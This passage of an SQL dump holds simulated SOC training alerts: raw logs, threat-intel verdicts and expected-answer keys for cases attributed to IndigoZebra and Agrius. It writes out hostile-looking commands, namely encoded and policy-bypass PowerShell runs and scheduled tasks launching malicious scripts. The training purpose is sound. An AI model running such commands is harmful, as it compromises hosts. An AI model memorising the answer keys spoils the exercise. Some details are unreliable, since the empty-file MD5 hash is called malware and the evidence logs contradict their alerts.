attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Username of the compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1327, 'Persistence Achieved via Scheduled Tasks', 'medium', 'System Logs', 'IndigoZebra ensures their presence by setting up scheduled tasks, allowing them to regain access even after system reboots. A scheduled task was created by the attacker to execute a malicious script periodically.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"4698\",\"task_name\":\"\\\\IndigoZebra_MaintainAccess\",\"task_content\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c C:\\\\Windows\\\\Temp\\\\malicious_script.bat\",\"user\":\"compromised_user\",\"user_sid\":\"S-1-5-21-123456789-1234567890-123456789-1001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sha256_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Legitimate user account on the network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of known malicious file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.815Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4698\\\",\\\"task_name\\\":\\\"\\\\\\\\IndigoZebra_MaintainAccess\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c 
C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious_script.bat\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-123456789-1234567890-123456789-1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"sha256_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1328, 'Unauthorized Access to Internal Networks', 'high', 'Intrusion Detection Systems', 'An unauthorized lateral movement attempt was detected from a compromised internal host to critical systems within the network. The attacker is leveraging valid credentials to expand access.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.1.1.12\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"event_type\":\"authentication_attempt\",\"status\":\"success\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_payload.exe\",\"event_id\":\"4624\",\"message\":\"Successful login using compromised credentials detected.\",\"process\":\"svchost.exe\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in unauthorized access attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Targeted critical system within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware sample used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"compromised\",\"details\":\"Compromised 
credentials used in the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials 
detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.818Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"destination_ip\\\":\\\"10.1.1.12\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"authentication_attempt\\\",\\\"status\\\":\\\"success\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Successful login using compromised credentials detected.\\\",\\\"process\\\":\\\"svchost.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1329, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Tools', 'IndigoZebra carried out the final stage of their operation, exfiltrating sensitive data using encrypted C2 channels. This activity was detected by our DLP tools, indicating the use of encrypted traffic to an external IP associated with known malicious activities.', 'Exfiltration', 'T1048', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:31Z\",\"event_id\":\"DLPE12345\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"data_volume\":\"15MB\",\"user\":\"jdoe\",\"filename\":\"sensitive_data.zip\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"action\":\"Data Exfiltration Detected\"}', '2026-03-01 22:55:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with IndigoZebra operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"File hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File involved in the data exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_db\",\"verdict\":\"internal\",\"details\":\"Username of the potentially compromised 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:31Z\\\",\\\"event_id\\\":\\\"DLPE12345\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"15MB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"sensitive_data.zip\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0\\\",\\\"action\\\":\\\"Data Exfiltration Detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1330, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway', 'A phishing email targeting key personnel in Israeli organizations has been detected. The email is suspected to have been sent by the Agrius APT group to harvest credentials. The email contains malicious links and attachments that urge the recipient to provide login information.', 'Initial Access', 'T1566 - Phishing', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T08:45:30Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.1.5\",\"sender_email\":\"alert@securemail.com\",\"recipient_email\":\"john.doe@israeli-org.org\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":{\"filename\":\"SecureUpdate.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"url\":\"http://malicious-update.com/securelogin\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"alert@securemail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered and used in phishing activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious document used in phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-update.com/securelogin\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis Service\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing landing page imitating legitimate 
service.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.822Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1331, 'Apostle Wiper Execution Attempt', 'high', 'Endpoint Detection and Response (EDR)', 'The Apostle malware was deployed attempting to execute under the guise of a ransomware attack. This is indicative of an Apostle wiper execution attempt, masquerading as ransomware.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_id\":\"4625\",\"source_ip\":\"185.230.150.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\ransomware.ps1\",\"file_hash\":\"3d2e479153a8f57f4f3b7e5c89f7a6e3c9b2f8d0\",\"filename\":\"ransomware.ps1\",\"action\":\"blocked\",\"severity\":\"high\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.230.150.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Apostle malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by Apostle malware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e479153a8f57f4f3b7e5c89f7a6e3c9b2f8d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Lab\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Apostle wiper variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"File masquerading as ransomware, used by Apostle wiper.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1332, 'Persistence Mechanism Detected', 'high', 'System Logs', 'Agrius has established a persistent backdoor using scheduled tasks and registry modifications on the host machine. This action aims to maintain access over an extended period.', 'Persistence', 'T1053.005 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:20Z\",\"event_id\":\"4624\",\"log_source\":\"Windows Security Log\",\"user\":\"malicious_user\",\"action\":\"Scheduled Task Creation\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\CriticalUpdate\",\"command\":\"C:\\\\Windows\\\\System32\\\\wscript.exe C:\\\\Users\\\\Public\\\\update.js\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"registry_modification\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousEntry\",\"source_ip\":\"45.76.23.89\",\"affected_host_ip\":\"192.168.1.102\"}', '2026-03-01 22:56:26', '2026-03-02 13:55:06', 